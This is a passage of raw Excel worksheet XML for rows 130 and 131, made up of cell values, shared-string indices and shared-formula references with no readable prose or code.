      <c r="DK130" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL130" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM130" s="108">
        <v>1325.0</v>
      </c>
      <c r="DN130" s="108">
        <v>1.0</v>
      </c>
      <c r="DO130" s="108">
        <v>1.0</v>
      </c>
      <c r="DP130" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ130" s="108">
        <v>1325.0</v>
      </c>
      <c r="DR130" s="108">
        <v>1.0</v>
      </c>
      <c r="DS130" s="108">
        <v>1.0</v>
      </c>
      <c r="DT130" s="108">
        <v>1325.0</v>
      </c>
      <c r="DU130" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV130" s="108">
        <f t="shared" si="221"/>
        <v>1325</v>
      </c>
      <c r="DW130" s="108">
        <v>1325.0</v>
      </c>
      <c r="DX130" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY130" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ130" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA130" s="108">
        <v>0.0</v>
      </c>
      <c r="EB130" s="108">
        <v>0.0</v>
      </c>
      <c r="EC130" s="109">
        <v>5.0</v>
      </c>
      <c r="ED130" s="109">
        <v>0.0</v>
      </c>
      <c r="EE130" s="109">
        <v>1.0</v>
      </c>
      <c r="EF130" s="109">
        <v>1.0</v>
      </c>
      <c r="EG130" s="109">
        <v>0.0</v>
      </c>
      <c r="EH130" s="109">
        <v>1.0</v>
      </c>
      <c r="EI130" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ130" s="109">
        <v>0.0</v>
      </c>
      <c r="EK130" s="109">
        <v>0.0</v>
      </c>
      <c r="EL130" s="109">
        <v>0.0</v>
      </c>
      <c r="EM130" s="109">
        <v>0.0</v>
      </c>
      <c r="EN130" s="109">
        <v>1.0</v>
      </c>
      <c r="EO130" s="109">
        <v>1.0</v>
      </c>
      <c r="EP130" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ130" s="109">
        <v>1.0</v>
      </c>
      <c r="ER130" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES130" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET130" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU130" s="110">
        <f t="shared" si="187"/>
        <v>1</v>
      </c>
      <c r="EV130" s="110">
        <f t="shared" si="188"/>
        <v>1</v>
      </c>
      <c r="EW130" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX130" s="110">
        <f t="shared" si="190"/>
        <v>1</v>
      </c>
      <c r="EY130" s="110">
        <f t="shared" si="191"/>
        <v>1</v>
      </c>
      <c r="EZ130" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA130" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB130" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC130" s="111" t="s">
        <v>2228</v>
      </c>
      <c r="FD130" s="111">
        <v>3.0</v>
      </c>
      <c r="FE130" s="111">
        <v>5.0</v>
      </c>
      <c r="FF130" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG130" s="111">
        <v>1325.0</v>
      </c>
      <c r="FH130" s="111">
        <v>1.0</v>
      </c>
      <c r="FI130" s="111">
        <v>1.0</v>
      </c>
      <c r="FJ130" s="111" t="s">
        <v>2228</v>
      </c>
      <c r="FK130" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL130" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2002752, 2002749,1325</v>
      </c>
      <c r="FM130" s="111">
        <v>1325.0</v>
      </c>
      <c r="FN130" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO130" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP130" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ130" s="111">
        <v>0.0</v>
      </c>
      <c r="FR130" s="111">
        <v>0.0</v>
      </c>
      <c r="FS130" s="112">
        <v>5.0</v>
      </c>
      <c r="FT130" s="112">
        <v>2.0</v>
      </c>
      <c r="FU130" s="112">
        <v>4.0</v>
      </c>
      <c r="FV130" s="112">
        <v>1.0</v>
      </c>
      <c r="FW130" s="112">
        <v>4.0</v>
      </c>
      <c r="FX130" s="112">
        <v>5.0</v>
      </c>
      <c r="FY130" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ130" s="112">
        <v>0.0</v>
      </c>
      <c r="GA130" s="112">
        <v>0.0</v>
      </c>
      <c r="GB130" s="112">
        <v>0.0</v>
      </c>
      <c r="GC130" s="112">
        <v>0.0</v>
      </c>
      <c r="GD130" s="112">
        <v>1.0</v>
      </c>
      <c r="GE130" s="112">
        <v>1.0</v>
      </c>
      <c r="GF130" s="112">
        <v>0.0</v>
      </c>
      <c r="GG130" s="112">
        <v>1.0</v>
      </c>
      <c r="GH130" s="113">
        <f t="shared" si="193"/>
        <v>2</v>
      </c>
      <c r="GI130" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ130" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK130" s="113">
        <f t="shared" si="196"/>
        <v>4</v>
      </c>
      <c r="GL130" s="113">
        <f t="shared" si="197"/>
        <v>1</v>
      </c>
      <c r="GM130" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN130" s="113">
        <f t="shared" si="199"/>
        <v>5</v>
      </c>
      <c r="GO130" s="113">
        <f t="shared" si="200"/>
        <v>1</v>
      </c>
      <c r="GP130" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ130" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR130" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS130" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT130" s="94"/>
      <c r="GU130" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV130" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW130" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF130" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG130" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH130" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI130" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ130" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK130" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL130" s="93">
        <v>5.0</v>
      </c>
      <c r="HM130" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN130" s="93">
        <v>0.0</v>
      </c>
      <c r="HO130" s="93">
        <v>0.0</v>
      </c>
      <c r="HP130" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ130" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR130" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS130" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT130" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU130" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV130" s="148">
        <v>31914.0</v>
      </c>
      <c r="HW130" s="119">
        <v>1.0</v>
      </c>
      <c r="HX130" s="119">
        <v>2.0</v>
      </c>
      <c r="HY130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC130" s="120">
        <f t="shared" ref="IC130:IC134" si="226">HV130</f>
        <v>31914</v>
      </c>
      <c r="ID130" s="120">
        <v>31914.0</v>
      </c>
      <c r="IE130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH130" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II130" s="99" t="s">
        <v>2229</v>
      </c>
      <c r="IJ130" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK130" s="99">
        <v>50.0</v>
      </c>
      <c r="IL130" s="99">
        <v>0.0</v>
      </c>
      <c r="IM130" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN130" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO130" s="98">
        <v>1.0</v>
      </c>
      <c r="IP130" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ130" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR130" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS130" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT130" s="127"/>
      <c r="IU130" s="127"/>
      <c r="IV130" s="127"/>
      <c r="IW130" s="127"/>
      <c r="IX130" s="127"/>
      <c r="IY130" s="127"/>
      <c r="IZ130" s="127"/>
      <c r="JA130" s="127"/>
      <c r="JB130" s="127"/>
      <c r="JC130" s="127"/>
      <c r="JD130" s="127"/>
      <c r="JE130" s="127"/>
      <c r="JF130" s="127"/>
      <c r="JG130" s="127"/>
      <c r="JH130" s="127"/>
      <c r="JI130" s="127"/>
      <c r="JJ130" s="127"/>
      <c r="JK130" s="127"/>
      <c r="JL130" s="127"/>
      <c r="JM130" s="127"/>
      <c r="JN130" s="127"/>
      <c r="JO130" s="127"/>
      <c r="JP130" s="127"/>
      <c r="JQ130" s="127"/>
      <c r="JR130" s="127"/>
      <c r="JS130" s="127"/>
      <c r="JT130" s="127"/>
      <c r="JU130" s="127"/>
      <c r="JV130" s="127"/>
      <c r="JW130" s="127"/>
      <c r="JX130" s="127"/>
      <c r="JY130" s="127"/>
      <c r="JZ130" s="127"/>
      <c r="KA130" s="127"/>
      <c r="KB130" s="127"/>
      <c r="KC130" s="127"/>
      <c r="KD130" s="127"/>
      <c r="KE130" s="127"/>
      <c r="KF130" s="127"/>
      <c r="KG130" s="127"/>
      <c r="KH130" s="127"/>
      <c r="KI130" s="127"/>
      <c r="KJ130" s="127"/>
      <c r="KK130" s="127"/>
      <c r="KL130" s="127"/>
      <c r="KM130" s="127"/>
      <c r="KN130" s="127"/>
      <c r="KO130" s="127"/>
      <c r="KP130" s="127"/>
      <c r="KQ130" s="127"/>
      <c r="KR130" s="127"/>
      <c r="KS130" s="127"/>
      <c r="KT130" s="127"/>
      <c r="KU130" s="127"/>
      <c r="KV130" s="127"/>
      <c r="KW130" s="127"/>
      <c r="KX130" s="127"/>
      <c r="KY130" s="127"/>
      <c r="KZ130" s="127"/>
      <c r="LA130" s="127"/>
      <c r="LB130" s="127"/>
      <c r="LC130" s="127"/>
      <c r="LD130" s="127"/>
      <c r="LE130" s="127"/>
      <c r="LF130" s="127"/>
      <c r="LG130" s="127"/>
      <c r="LH130" s="127"/>
      <c r="LI130" s="127"/>
      <c r="LJ130" s="127"/>
      <c r="LK130" s="127"/>
      <c r="LL130" s="127"/>
      <c r="LM130" s="127"/>
      <c r="LN130" s="127"/>
      <c r="LO130" s="127"/>
      <c r="LP130" s="127"/>
      <c r="LQ130" s="127"/>
      <c r="LR130" s="127"/>
      <c r="LS130" s="127"/>
      <c r="LT130" s="127"/>
      <c r="LU130" s="127"/>
      <c r="LV130" s="127"/>
      <c r="LW130" s="127"/>
      <c r="LX130" s="127"/>
      <c r="LY130" s="127"/>
      <c r="LZ130" s="127"/>
      <c r="MA130" s="127"/>
      <c r="MB130" s="127"/>
      <c r="MC130" s="127"/>
      <c r="MD130" s="127"/>
      <c r="ME130" s="127"/>
      <c r="MF130" s="127"/>
      <c r="MG130" s="127"/>
      <c r="MH130" s="127"/>
      <c r="MI130" s="127"/>
      <c r="MJ130" s="127"/>
      <c r="MK130" s="127"/>
      <c r="ML130" s="127"/>
      <c r="MM130" s="127"/>
      <c r="MN130" s="127"/>
      <c r="MO130" s="127"/>
      <c r="MP130" s="127"/>
      <c r="MQ130" s="127"/>
      <c r="MR130" s="127"/>
      <c r="MS130" s="127"/>
      <c r="MT130" s="127"/>
      <c r="MU130" s="127"/>
      <c r="MV130" s="127"/>
      <c r="MW130" s="127"/>
      <c r="MX130" s="127"/>
      <c r="MY130" s="127"/>
      <c r="MZ130" s="127"/>
      <c r="NA130" s="127"/>
      <c r="NB130" s="127"/>
      <c r="NC130" s="127"/>
      <c r="ND130" s="127"/>
      <c r="NE130" s="127"/>
      <c r="NF130" s="127"/>
      <c r="NG130" s="127"/>
      <c r="NH130" s="127"/>
      <c r="NI130" s="127"/>
      <c r="NJ130" s="127"/>
      <c r="NK130" s="127"/>
      <c r="NL130" s="127"/>
      <c r="NM130" s="127"/>
      <c r="NN130" s="127"/>
      <c r="NO130" s="127"/>
      <c r="NP130" s="127"/>
      <c r="NQ130" s="127"/>
      <c r="NR130" s="127"/>
      <c r="NS130" s="127"/>
      <c r="NT130" s="127"/>
      <c r="NU130" s="127"/>
      <c r="NV130" s="127"/>
      <c r="NW130" s="127"/>
      <c r="NX130" s="127"/>
      <c r="NY130" s="127"/>
    </row>
    <row r="131" ht="229.5" customHeight="1">
      <c r="B131" s="89" t="s">
        <v>664</v>
      </c>
      <c r="C131" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D131" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E131" s="90" t="s">
        <v>2215</v>
      </c>
      <c r="F131" s="90" t="s">
        <v>2216</v>
      </c>
      <c r="G131" s="90" t="s">
        <v>2230</v>
      </c>
      <c r="H131" s="90" t="s">
        <v>2218</v>
      </c>
      <c r="I131" s="92" t="s">
        <v>2219</v>
      </c>
      <c r="J131" s="92" t="s">
        <v>2220</v>
      </c>
      <c r="K131" s="92" t="s">
        <v>2231</v>
      </c>
      <c r="L131" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M131" s="93">
        <v>3.0</v>
      </c>
      <c r="N131" s="93">
        <v>1.0</v>
      </c>
      <c r="O131" s="93">
        <v>0.0</v>
      </c>
      <c r="P131" s="93">
        <v>1.0</v>
      </c>
      <c r="Q131" s="93">
        <f t="shared" si="204"/>
        <v>1</v>
      </c>
      <c r="R131" s="93">
        <v>1.0</v>
      </c>
      <c r="S131" s="93">
        <v>0.0</v>
      </c>
      <c r="T131" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U131" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V131" s="96" t="s">
        <v>2222</v>
      </c>
      <c r="W131" s="96" t="s">
        <v>2223</v>
      </c>
      <c r="X131" s="126" t="s">
        <v>2224</v>
      </c>
      <c r="Y131" s="126" t="s">
        <v>2225</v>
      </c>
      <c r="Z131" s="132" t="s">
        <v>2226</v>
      </c>
      <c r="AA131" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB131" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC131" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD131" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE131" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF131" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG131" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH131" s="99" t="s">
        <v>2227</v>
      </c>
      <c r="AI131" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ131" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL131" s="100">
        <v>0.0</v>
      </c>
      <c r="AM131" s="100">
        <v>0.0</v>
      </c>
      <c r="AN131" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP131" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ131" s="100">
        <v>0.0</v>
      </c>
      <c r="AR131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX131" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY131" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ131" s="100">
        <v>0.0</v>
      </c>
      <c r="BA131" s="102">
        <v>3.0</v>
      </c>
      <c r="BB131" s="102">
        <v>0.0</v>
      </c>
      <c r="BC131" s="102">
        <v>0.0</v>
      </c>
      <c r="BD131" s="102">
        <v>0.0</v>
      </c>
      <c r="BE131" s="102">
        <v>0.0</v>
      </c>
      <c r="BF131" s="102">
        <v>0.0</v>
      </c>
      <c r="BG131" s="102">
        <v>0.0</v>
      </c>
      <c r="BH131" s="102">
        <v>0.0</v>
      </c>
      <c r="BI131" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ131" s="102">
        <v>0.0</v>
      </c>
      <c r="BK131" s="102">
        <v>0.0</v>
      </c>
      <c r="BL131" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM131" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN131" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO131" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP131" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ131" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR131" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS131" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT131" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU131" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV131" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX131" s="104">
        <v>0.0</v>
      </c>
      <c r="BY131" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ131" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB131" s="104">
        <v>0.0</v>
      </c>
      <c r="CC131" s="104">
        <v>0.0</v>
      </c>
      <c r="CD131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF131" s="104" t="str">
        <f t="shared" si="215"/>
        <v>-</v>
      </c>
      <c r="CG131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ131" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK131" s="104">
        <v>0.0</v>
      </c>
      <c r="CL131" s="104">
        <v>0.0</v>
      </c>
      <c r="CM131" s="105">
        <v>3.0</v>
      </c>
      <c r="CN131" s="105">
        <v>0.0</v>
      </c>
      <c r="CO131" s="105">
        <v>0.0</v>
      </c>
      <c r="CP131" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ131" s="105">
        <v>0.0</v>
      </c>
      <c r="CR131" s="105">
        <v>0.0</v>
      </c>
      <c r="CS131" s="105">
        <v>0.0</v>
      </c>
      <c r="CT131" s="105">
        <v>0.0</v>
      </c>
      <c r="CU131" s="105">
        <v>0.0</v>
      </c>
      <c r="CV131" s="105">
        <v>0.0</v>
      </c>
      <c r="CW131" s="105">
        <v>0.0</v>
      </c>
      <c r="CX131" s="105">
        <v>0.0</v>
      </c>
      <c r="CY131" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ131" s="105">
        <v>0.0</v>
      </c>
      <c r="DA131" s="105">
        <v>0.0</v>
      </c>
      <c r="DB131" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC131" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD131" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE131" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF131" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG131" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH131" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI131" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ131" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK131" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL131" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN131" s="108">
        <v>0.0</v>
      </c>
      <c r="DO131" s="108">
        <v>0.0</v>
      </c>
      <c r="DP131" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR131" s="108">
        <v>0.0</v>
      </c>
      <c r="DS131" s="108">
        <v>0.0</v>
      </c>
      <c r="DT131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV131" s="108" t="str">
        <f t="shared" si="221"/>
        <v>-</v>
      </c>
      <c r="DW131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ131" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA131" s="108">
        <v>0.0</v>
      </c>
      <c r="EB131" s="108">
        <v>0.0</v>
      </c>
      <c r="EC131" s="109">
        <v>3.0</v>
      </c>
      <c r="ED131" s="109">
        <v>0.0</v>
      </c>
      <c r="EE131" s="109">
        <v>0.0</v>
      </c>
      <c r="EF131" s="109">
        <v>0.0</v>
      </c>
      <c r="EG131" s="109">
        <v>0.0</v>
      </c>
      <c r="EH131" s="109">
        <v>0.0</v>
      </c>
      <c r="EI131" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ131" s="109">
        <v>0.0</v>
      </c>
      <c r="EK131" s="109">
        <v>0.0</v>
      </c>
      <c r="EL131" s="109">
        <v>0.0</v>
      </c>
      <c r="EM131" s="109">
        <v>0.0</v>
      </c>
      <c r="EN131" s="109">
        <v>0.0</v>
      </c>
      <c r="EO131" s="109">
        <v>0.0</v>
      </c>
      <c r="EP131" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ131" s="109">
        <v>0.0</v>
      </c>
      <c r="ER131" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES131" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET131" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU131" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV131" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW131" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX131" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY131" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ131" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA131" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB131" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC131" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD131" s="111">
        <v>2.0</v>
      </c>
      <c r="FE131" s="111">
        <v>2.0</v>
      </c>
      <c r="FF131" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG131" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH131" s="111">
        <v>0.0</v>
      </c>
      <c r="FI131" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ131" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK131" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL131" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM131" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN131" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO131" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP131" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ131" s="111">
        <v>0.0</v>
      </c>
      <c r="FR131" s="111">
        <v>0.0</v>
      </c>
      <c r="FS131" s="112">
        <v>3.0</v>
      </c>
      <c r="FT131" s="112">
        <v>1.0</v>
      </c>
      <c r="FU131" s="112">
        <v>1.0</v>
      </c>
      <c r="FV131" s="112">
        <v>0.0</v>
      </c>
      <c r="FW131" s="112">
        <v>2.0</v>
      </c>
      <c r="FX131" s="112">
        <v>2.0</v>
      </c>
      <c r="FY131" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ131" s="112">
        <v>0.0</v>
      </c>
      <c r="GA131" s="112">
        <v>0.0</v>
      </c>
      <c r="GB131" s="112">
        <v>0.0</v>
      </c>
      <c r="GC131" s="112">
        <v>0.0</v>
      </c>
      <c r="GD131" s="112">
        <v>0.0</v>
      </c>
      <c r="GE131" s="112">
        <v>0.0</v>
      </c>
      <c r="GF131" s="112">
        <v>0.0</v>
      </c>
      <c r="GG131" s="112">
        <v>0.0</v>
      </c>
      <c r="GH131" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI131" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ131" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK131" s="113">
        <f t="shared" si="196"/>
        <v>1</v>
      </c>
      <c r="GL131" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM131" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN131" s="113">
        <f t="shared" si="199"/>
        <v>2</v>
      </c>
      <c r="GO131" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP131" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ131" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR131" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS131" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT131" s="94"/>
      <c r="GU131" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV131" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW131" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF131" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG131" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH131" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI131" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ131" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK131" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL131" s="93">
        <v>1.0</v>
      </c>
      <c r="HM131" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN131" s="93">
        <v>0.0</v>
      </c>
      <c r="HO131" s="93">
        <v>0.0</v>
      </c>
      <c r="HP131" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ131" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR131" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS131" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT131" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU131" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV131" s="145">
        <v>31914.0</v>
      </c>
      <c r="HW131" s="119">
        <v>1.0</v>
      </c>
      <c r="HX131" s="119">
        <v>1.0</v>
      </c>
      <c r="HY131" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ131" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA131" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB131" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC131" s="120">
